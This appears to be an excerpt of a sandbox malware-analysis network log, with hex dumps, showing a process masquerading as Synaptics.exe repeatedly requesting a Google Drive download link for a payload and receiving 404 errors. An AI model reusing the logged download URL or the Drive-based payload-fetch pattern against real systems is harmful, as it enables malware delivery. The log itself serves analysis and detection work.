                                                                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                    2024-12-30 10:25:42 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 36 32 47 75 65 37 76 30 63 41 52 7a 63 61 2d 62 4c 6c 56 4a 36 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                    Data Ascii: t Found)!!1</title><style nonce="62Gue7v0cARzca-bLlVJ6w">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                    2024-12-30 10:25:42 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                    Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    54192.168.2.949807142.250.185.784437464C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-12-30 10:25:41 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Host: docs.google.com
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Cookie: NID=520=GeADDF2jtnTOSWuNvVSCBUVCQnLIcC2R3xhTPQcEUg_sy0h2efNq5EbCIJwEgYKOk8wak7YBLsqRj7pZl4VgPuwmUExArEOffpmBGDOe1qdVhzzSDux5QFLM1QvX9N7NIVNWVpDS373hXDW_fH-Xz-188HVH7PVlbDTB7CfGt-x6CO33xt-VNJP4
                                                                                                                    2024-12-30 10:25:42 UTC1314INHTTP/1.1 303 See Other
                                                                                                                    Content-Type: application/binary
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:25:42 GMT
                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-MDMaCh0CHMcsZ2BWIIkCvQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Server: ESF
                                                                                                                    Content-Length: 0
                                                                                                                    X-XSS-Protection: 0
                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Connection: close


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    55192.168.2.949809142.250.185.784437464C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-12-30 10:25:42 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Host: docs.google.com
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Cookie: NID=520=GeADDF2jtnTOSWuNvVSCBUVCQnLIcC2R3xhTPQcEUg_sy0h2efNq5EbCIJwEgYKOk8wak7YBLsqRj7pZl4VgPuwmUExArEOffpmBGDOe1qdVhzzSDux5QFLM1QvX9N7NIVNWVpDS373hXDW_fH-Xz-188HVH7PVlbDTB7CfGt-x6CO33xt-VNJP4
                                                                                                                    2024-12-30 10:25:42 UTC1314INHTTP/1.1 303 See Other
                                                                                                                    Content-Type: application/binary
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:25:42 GMT
                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-PwUsqQq_so9XQjMMvbsgcQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Server: ESF
                                                                                                                    Content-Length: 0
                                                                                                                    X-XSS-Protection: 0
                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Connection: close


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    56192.168.2.949808142.250.186.974437464C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-12-30 10:25:42 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Cookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                                                                                                                    2024-12-30 10:25:43 UTC1250INHTTP/1.1 404 Not Found
                                                                                                                    X-GUploader-UploadID: AFiumC65jHHTHh9eGjuIguwqO6r9vMh8tKJyuafVV16hH_xhzg1rpKmMxk3ig1CSd65hA4fOEEDosaA
                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:25:42 GMT
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-i5yUbJkJkp540OPeLVqMnA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Content-Length: 1652
                                                                                                                    Server: UploadServer
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                    Connection: close
                                                                                                                    2024-12-30 10:25:43 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                    2024-12-30 10:25:43 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 74 55 77 77 37 47 74 62 71 53 77 4c 65 70 33 70 69 72 72 38 4f 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                                    Data Ascii: 404 (Not Found)!!1</title><style nonce="tUww7GtbqSwLep3pirr8Og">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                    2024-12-30 10:25:43 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                    Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    57192.168.2.949812142.250.185.784437464C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-12-30 10:25:43 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Host: docs.google.com
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Cookie: NID=520=GeADDF2jtnTOSWuNvVSCBUVCQnLIcC2R3xhTPQcEUg_sy0h2efNq5EbCIJwEgYKOk8wak7YBLsqRj7pZl4VgPuwmUExArEOffpmBGDOe1qdVhzzSDux5QFLM1QvX9N7NIVNWVpDS373hXDW_fH-Xz-188HVH7PVlbDTB7CfGt-x6CO33xt-VNJP4
                                                                                                                    2024-12-30 10:25:43 UTC1314INHTTP/1.1 303 See Other
                                                                                                                    Content-Type: application/binary
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:25:43 GMT
                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-8-ALrRVUVPanVHnLawmMng' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Server: ESF
                                                                                                                    Content-Length: 0
                                                                                                                    X-XSS-Protection: 0
                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Connection: close


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    58192.168.2.949811142.250.186.974437464C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-12-30 10:25:43 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Cookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                                                                                                                    2024-12-30 10:25:43 UTC1250INHTTP/1.1 404 Not Found
                                                                                                                    X-GUploader-UploadID: AFiumC6lEiPWnEutgnpaJ-M4i2D5Tj9vFe-mE9RkRX4dlnLgyXYbjCQc28rEzi2ZhwbVNLJolkFpow4
                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:25:43 GMT
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-s3x3kMhVWRMJKk_KoXwoiw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Content-Length: 1652
                                                                                                                    Server: UploadServer
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                    Connection: close
                                                                                                                    2024-12-30 10:25:43 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                    2024-12-30 10:25:43 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 4b 33 69 72 34 4d 6b 54 59 38 4a 79 51 45 53 56 6b 69 52 57 71 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                                    Data Ascii: 404 (Not Found)!!1</title><style nonce="K3ir4MkTY8JyQESVkiRWqw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                    2024-12-30 10:25:43 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                    Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    59192.168.2.949815142.250.185.784437464C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-12-30 10:25:43 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Host: docs.google.com
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Cookie: NID=520=GeADDF2jtnTOSWuNvVSCBUVCQnLIcC2R3xhTPQcEUg_sy0h2efNq5EbCIJwEgYKOk8wak7YBLsqRj7pZl4VgPuwmUExArEOffpmBGDOe1qdVhzzSDux5QFLM1QvX9N7NIVNWVpDS373hXDW_fH-Xz-188HVH7PVlbDTB7CfGt-x6CO33xt-VNJP4
                                                                                                                    2024-12-30 10:25:43 UTC1314INHTTP/1.1 303 See Other
                                                                                                                    Content-Type: application/binary
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:25:43 GMT
                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-utWVECkj1uTa91EC1oBS4Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Server: ESF
                                                                                                                    Content-Length: 0
                                                                                                                    X-XSS-Protection: 0
                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Connection: close


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    60192.168.2.949816142.250.186.974437464C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-12-30 10:25:43 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Cookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                                                                                                                    2024-12-30 10:25:44 UTC1250INHTTP/1.1 404 Not Found
                                                                                                                    X-GUploader-UploadID: AFiumC6HjS2LZhbcGPSGowaIXzbvS8zp4gPuvoQKlvUQ23kkfXHyIJnqznf9M1CXb5K5ENDs2IFV7EQ
                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:25:44 GMT
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-HjljMUQ8JXEj-YAHg7kWKQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Content-Length: 1652
                                                                                                                    Server: UploadServer
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                    Connection: close
                                                                                                                    2024-12-30 10:25:44 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                    2024-12-30 10:25:44 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 73 68 34 52 53 42 78 62 54 32 78 5a 76 50 74 48 77 52 49 72 71 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
